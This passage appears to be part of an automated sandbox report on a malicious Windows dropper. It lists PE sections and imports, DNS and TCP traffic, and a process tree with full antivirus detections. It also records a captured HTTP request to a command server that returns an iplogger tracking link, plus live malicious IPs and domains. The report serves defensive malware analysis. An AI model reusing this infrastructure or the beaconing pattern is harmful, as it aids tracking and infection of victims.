                                                                                                              .didat0x660000x15c0x200False0.408203125data2.99773455687IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                              .rsrc0x670000xdfd00xe000False0.637050083705data6.63698184983IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                              .reloc0x750000x27ec0x2800False0.8044921875data6.7259837024IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                              Resources

                                                                                                              NameRVASizeTypeLanguageCountry
                                                                                                              PNG0x676500xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States
                                                                                                              PNG0x681980x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States
                                                                                                              RT_ICON0x697480x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                              RT_ICON0x69cb00x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                              RT_ICON0x6a5580xea8dataEnglishUnited States
                                                                                                              RT_ICON0x6b4000x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                              RT_ICON0x6b8680x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                              RT_ICON0x6c9100x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                              RT_ICON0x6eeb80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                              RT_DIALOG0x735880x286dataEnglishUnited States
                                                                                                              RT_DIALOG0x733580x13adataEnglishUnited States
                                                                                                              RT_DIALOG0x734980xecdataEnglishUnited States
                                                                                                              RT_DIALOG0x732280x12edataEnglishUnited States
                                                                                                              RT_DIALOG0x72ef00x338dataEnglishUnited States
                                                                                                              RT_DIALOG0x72c980x252dataEnglishUnited States
                                                                                                              RT_STRING0x73f680x1e2dataEnglishUnited States
                                                                                                              RT_STRING0x741500x1ccdataEnglishUnited States
                                                                                                              RT_STRING0x743200x1b8dataEnglishUnited States
                                                                                                              RT_STRING0x744d80x146Hitachi SH big-endian COFF object file, not stripped, 17152 sections, symbol offset=0x73006500EnglishUnited States
                                                                                                              RT_STRING0x746200x446dataEnglishUnited States
                                                                                                              RT_STRING0x74a680x166dataEnglishUnited States
                                                                                                              RT_STRING0x74bd00x152dataEnglishUnited States
                                                                                                              RT_STRING0x74d280x10adataEnglishUnited States
                                                                                                              RT_STRING0x74e380xbcdataEnglishUnited States
                                                                                                              RT_STRING0x74ef80xd6dataEnglishUnited States
                                                                                                              RT_GROUP_ICON0x72c300x68dataEnglishUnited States
                                                                                                              RT_MANIFEST0x738100x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                                                                                              Imports

                                                                                                              DLLImport
                                                                                                              KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, GetCurrentProcess, TerminateProcess, RtlUnwind, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                                                                              gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                                                                                                              Possible Origin

                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States

                                                                                                              Network Behavior

                                                                                                              Network Port Distribution

                                                                                                              TCP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 28, 2020 15:07:10.123815060 CET4973280192.168.2.5101.36.107.74
                                                                                                              Nov 28, 2020 15:07:10.383060932 CET8049732101.36.107.74192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.383348942 CET4973280192.168.2.5101.36.107.74
                                                                                                              Nov 28, 2020 15:07:10.385420084 CET4973280192.168.2.5101.36.107.74
                                                                                                              Nov 28, 2020 15:07:10.643752098 CET8049732101.36.107.74192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.647347927 CET8049732101.36.107.74192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.690886974 CET4973280192.168.2.5101.36.107.74
                                                                                                              Nov 28, 2020 15:07:10.825555086 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:10.847800016 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.847906113 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:10.852497101 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:10.874772072 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.876108885 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.876132965 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.876152992 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.876172066 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.876313925 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:10.989924908 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:11.013079882 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:11.050437927 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:11.081525087 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:11.081581116 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:11.081764936 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:11.213141918 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:11.235768080 CET4434973388.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:11.237801075 CET49733443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:15.647485018 CET8049732101.36.107.74192.168.2.5
                                                                                                              Nov 28, 2020 15:07:15.649553061 CET4973280192.168.2.5101.36.107.74
                                                                                                              Nov 28, 2020 15:07:15.657855988 CET4973280192.168.2.5101.36.107.74
                                                                                                              Nov 28, 2020 15:07:15.916197062 CET8049732101.36.107.74192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.017199039 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.039550066 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.039808035 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.042964935 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.065248013 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.067945957 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.067984104 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.068008900 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.068033934 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.068073034 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.068104982 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.082701921 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.106343985 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.106636047 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.109718084 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:27.141027927 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.141211033 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:35.965049028 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:35.992804050 CET4434973788.99.66.31192.168.2.5
                                                                                                              Nov 28, 2020 15:07:35.992925882 CET49737443192.168.2.588.99.66.31
                                                                                                              Nov 28, 2020 15:07:36.034851074 CET49737443192.168.2.588.99.66.31

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Nov 28, 2020 15:05:07.095318079 CET6318353192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:07.133047104 CET53631838.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:08.119956970 CET6015153192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:08.147207022 CET53601518.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:09.232023001 CET5696953192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:09.259229898 CET53569698.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:10.403655052 CET5516153192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:10.430695057 CET53551618.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:11.601398945 CET5475753192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:11.628647089 CET53547578.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:24.353724003 CET4999253192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:24.391411066 CET53499928.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:30.798348904 CET6007553192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:30.836570024 CET53600758.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:32.873336077 CET5501653192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:32.900485992 CET53550168.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:36.056870937 CET6434553192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:36.083870888 CET53643458.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:55.802947998 CET5712853192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:55.854155064 CET53571288.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:05:57.190603018 CET5479153192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:05:57.227457047 CET53547918.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:06:01.406568050 CET5046353192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:06:01.449820995 CET53504638.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:06:02.737278938 CET5039453192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:06:02.774029970 CET53503948.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:06:34.033473015 CET5853053192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:06:34.060530901 CET53585308.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:10.783339977 CET5381353192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:10.818804026 CET53538138.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:21.704451084 CET6373253192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:21.745177984 CET53637328.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:23.718533993 CET5734453192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:23.745588064 CET53573448.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:26.942025900 CET5445053192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:27.013183117 CET53544508.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:27.148013115 CET5926153192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:27.195842981 CET53592618.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:28.849608898 CET5715153192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:28.885410070 CET53571518.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:33.152123928 CET5941353192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:33.153711081 CET6051653192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:33.187537909 CET53594138.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:33.189069033 CET53605168.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:33.945458889 CET5164953192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:33.981333017 CET53516498.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:34.729815006 CET6508653192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:34.852657080 CET53650868.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:35.556140900 CET5643253192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:35.591646910 CET53564328.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:36.369559050 CET5292953192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:36.410165071 CET53529298.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:37.115530014 CET6431753192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:37.142649889 CET53643178.8.8.8192.168.2.5
                                                                                                              Nov 28, 2020 15:07:38.323499918 CET6237253192.168.2.58.8.8.8
                                                                                                              Nov 28, 2020 15:07:38.362081051 CET53623728.8.8.8192.168.2.5

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                              Nov 28, 2020 15:06:01.406568050 CET192.168.2.58.8.8.80xc97bStandard query (0)g.msn.comA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:10.783339977 CET192.168.2.58.8.8.80x7e08Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:21.704451084 CET192.168.2.58.8.8.80x301bStandard query (0)7553014bd6a4211b.xyzA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:26.942025900 CET192.168.2.58.8.8.80x43f1Standard query (0)iplogger.orgA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:27.148013115 CET192.168.2.58.8.8.80xff88Standard query (0)www.evograph.roA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:28.849608898 CET192.168.2.58.8.8.80x8e02Standard query (0)www.evograph.roA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.152123928 CET192.168.2.58.8.8.80x7481Standard query (0)7553014bd6a4211b.xyzA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.153711081 CET192.168.2.58.8.8.80x504Standard query (0)7553014bd6a4211b.xyzA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:34.729815006 CET192.168.2.58.8.8.80x686Standard query (0)trueaerned.comA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:36.369559050 CET192.168.2.58.8.8.80x7f6bStandard query (0)jojo-soft.xyzA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:37.115530014 CET192.168.2.58.8.8.80x4ceaStandard query (0)ip-api.comA (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:38.323499918 CET192.168.2.58.8.8.80x75f3Standard query (0)p421ls.xyzA (IP address)IN (0x0001)

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                              Nov 28, 2020 15:06:01.449820995 CET8.8.8.8192.168.2.50xc97bNo error (0)g.msn.comg-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:10.818804026 CET8.8.8.8192.168.2.50x7e08No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:21.745177984 CET8.8.8.8192.168.2.50x301bNo error (0)7553014bd6a4211b.xyz172.67.157.133A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:21.745177984 CET8.8.8.8192.168.2.50x301bNo error (0)7553014bd6a4211b.xyz104.24.114.254A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:21.745177984 CET8.8.8.8192.168.2.50x301bNo error (0)7553014bd6a4211b.xyz104.24.115.254A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:27.013183117 CET8.8.8.8192.168.2.50x43f1No error (0)iplogger.org88.99.66.31A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:27.195842981 CET8.8.8.8192.168.2.50xff88No error (0)www.evograph.roevograph.roCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:27.195842981 CET8.8.8.8192.168.2.50xff88No error (0)evograph.ro89.40.17.17A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:28.885410070 CET8.8.8.8192.168.2.50x8e02No error (0)www.evograph.roevograph.roCNAME (Canonical name)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:28.885410070 CET8.8.8.8192.168.2.50x8e02No error (0)evograph.ro89.40.17.17A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.187537909 CET8.8.8.8192.168.2.50x7481No error (0)7553014bd6a4211b.xyz172.67.157.133A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.187537909 CET8.8.8.8192.168.2.50x7481No error (0)7553014bd6a4211b.xyz104.24.114.254A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.187537909 CET8.8.8.8192.168.2.50x7481No error (0)7553014bd6a4211b.xyz104.24.115.254A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.189069033 CET8.8.8.8192.168.2.50x504No error (0)7553014bd6a4211b.xyz172.67.157.133A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.189069033 CET8.8.8.8192.168.2.50x504No error (0)7553014bd6a4211b.xyz104.24.114.254A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:33.189069033 CET8.8.8.8192.168.2.50x504No error (0)7553014bd6a4211b.xyz104.24.115.254A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:34.852657080 CET8.8.8.8192.168.2.50x686No error (0)trueaerned.com198.98.57.54A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:36.410165071 CET8.8.8.8192.168.2.50x7f6bNo error (0)jojo-soft.xyz104.31.72.130A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:36.410165071 CET8.8.8.8192.168.2.50x7f6bNo error (0)jojo-soft.xyz104.31.73.130A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:36.410165071 CET8.8.8.8192.168.2.50x7f6bNo error (0)jojo-soft.xyz172.67.194.188A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:37.142649889 CET8.8.8.8192.168.2.50x4ceaNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:38.362081051 CET8.8.8.8192.168.2.50x75f3No error (0)p421ls.xyz104.31.90.245A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:38.362081051 CET8.8.8.8192.168.2.50x75f3No error (0)p421ls.xyz104.31.91.245A (IP address)IN (0x0001)
                                                                                                              Nov 28, 2020 15:07:38.362081051 CET8.8.8.8192.168.2.50x75f3No error (0)p421ls.xyz172.67.160.131A (IP address)IN (0x0001)

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • https:
                                                                                                                • 101.36.107.74

                                                                                                              HTTP Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              0192.168.2.549732101.36.107.7480C:\Users\user\AppData\Local\Temp\RarSFX0\jg2_2qua.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Nov 28, 2020 15:07:10.385420084 CET4381OUTGET /seemorebty/il.php?e=jg2_2qua HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                              Referer: https://www.facebook.com
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
                                                                                                              Host: 101.36.107.74
                                                                                                              Nov 28, 2020 15:07:10.647347927 CET4381INHTTP/1.1 200 OK
                                                                                                              Date: Sat, 28 Nov 2020 14:07:10 GMT
                                                                                                              Server: Apache/2.4.37 (centos)
                                                                                                              X-Powered-By: PHP/7.2.24
                                                                                                              Keep-Alive: timeout=5, max=100
                                                                                                              Connection: Keep-Alive
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Data Raw: 31 61 0d 0a 68 74 74 70 73 3a 2f 2f 69 70 6c 6f 67 67 65 72 2e 6f 72 67 2f 5a 64 6e 59 37 0d 0a 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 1ahttps://iplogger.org/ZdnY70


                                                                                                              HTTPS Packets

                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                              Nov 28, 2020 15:07:10.876172066 CET88.99.66.31443192.168.2.549733CN=*.iplogger.org CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Nov 20 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Nov 21 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                              CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                              CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029
                                                                                                              Nov 28, 2020 15:07:27.068033934 CET88.99.66.31443192.168.2.549737CN=*.iplogger.org CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Nov 20 01:00:00 CET 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019Sun Nov 21 00:59:59 CET 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                              CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GBCN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USFri Nov 02 01:00:00 CET 2018Wed Jan 01 00:59:59 CET 2031
                                                                                                              CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=USCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBTue Mar 12 01:00:00 CET 2019Mon Jan 01 00:59:59 CET 2029

                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              Analysis Process: KeJ7Cl7flZ.exe PID: 4576 Parent PID: 5700

                                                                                                              General

                                                                                                              Start time:15:05:13
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Users\user\Desktop\KeJ7Cl7flZ.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\KeJ7Cl7flZ.exe'
                                                                                                              Imagebase:0xec0000
                                                                                                              File size:7922731 bytes
                                                                                                              MD5 hash:4E759849412063C6590936671CE4AA0E
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:low

                                                                                                              Analysis Process: 002.exe PID: 3568 Parent PID: 4576

                                                                                                              General

                                                                                                              Start time:15:05:15
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\RarSFX0\002.exe'
                                                                                                              Imagebase:0x1260000
                                                                                                              File size:1306112 bytes
                                                                                                              MD5 hash:6503C9C4F19A4B33B701CC5B97B349BC
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Avira
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              Reputation:low

                                                                                                              Analysis Process: WerFault.exe PID: 204 Parent PID: 3568

                                                                                                              General

                                                                                                              Start time:15:05:17
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 724
                                                                                                              Imagebase:0x2a0000
                                                                                                              File size:434592 bytes
                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: WerFault.exe PID: 204 Parent PID: 3568

                                                                                                              General

                                                                                                              Start time:15:05:27
                                                                                                              Start date:28/11/2020
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3568 -s 740
                                                                                                              Imagebase:0x2a0000
                                                                                                              File size:434592 bytes
                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
